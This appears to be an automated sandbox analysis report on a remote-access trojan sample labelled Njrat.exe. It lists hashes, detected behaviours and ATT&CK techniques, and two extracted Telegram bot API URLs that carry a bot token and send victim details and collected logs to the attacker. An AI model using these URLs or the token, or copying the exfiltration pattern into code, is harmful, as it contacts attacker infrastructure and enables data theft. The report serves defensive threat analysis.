General
- Target: Njrat.exe
- Size: 3.1MB
- Sample: 240704-khqmcaseqr
- MD5: 7bbb27a3b9ace5f7d403ba8d6ef58d28
- SHA1: 5effbe830a93770824ee60f65eac790dda1ee807
- SHA256: d9dc76fcec48e47d8a10afa9ee40af17b856bff408bbc3eb36f5d362364a8d4c
- SHA512: 32774b5efc9a4c771ed74cb59d6e4221d4cfb92e05d18cf9d3ad53b957005cce84892ef9e563d2c4c932127dac595394e23d8bc3e2a6ab3a654acef5e24e0327
- SSDEEP: 49152:VbA3GVZoGDweuD4gWA7evLcjM3wwwZHFXIJ5nDWhVGUwwB3SNZts8zOqhsg:VbZDweuD4rcH9Vl65Dac7ssNj
Behavioral task
- behavioral1
  - Sample: Njrat.exe
  - Resource: win7-20240221-en

Malware Config
- Extracted
  - Family: gurcu
  - URLs:
    - https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendPhoto?chat_id=https://t.me/Eblan30000000_bot&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%E2%80%A2%20Comment%3A%20njRAT%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20TMUACBLB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CAdobe%5CAcrobat%20Reader%20DC%5CReader%5CUIThemes%5CbackgroundTaskHost.ex
    - https://api.telegram.org/bot7254629454:AAGjOAEp2s0ZiG-YjCrzgjlow6_jHxosWUM/sendDocument?chat_id=https://t.me/Eblan30000000_bot&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20d0ad2af92a8573eedb79c12f71dbdb0a04a63544%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.750307
Targets
- Target: Njrat.exe
- DcRat
  DarkCrystal (DC) is a .NET RAT, active since June 2019, capable of loading additional plugins.
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Command and Scripting Interpreter: PowerShell
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
- Checks computer location settings
  Looks up the country code configured in the registry, likely for geofencing.
- Executes dropped EXE
- Loads dropped DLL
- Accesses cryptocurrency files/wallets, possible credential harvesting
- Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software installed on the system.
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP address.
MITRE ATT&CK Enterprise v15
- Execution
  - Command and Scripting Interpreter (1)
    - PowerShell (1)
  - Scheduled Task/Job (1)
    - Scheduled Task (1)
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1)
    - Bypass User Account Control (1)
  - Scheduled Task/Job (1)
    - Scheduled Task (1)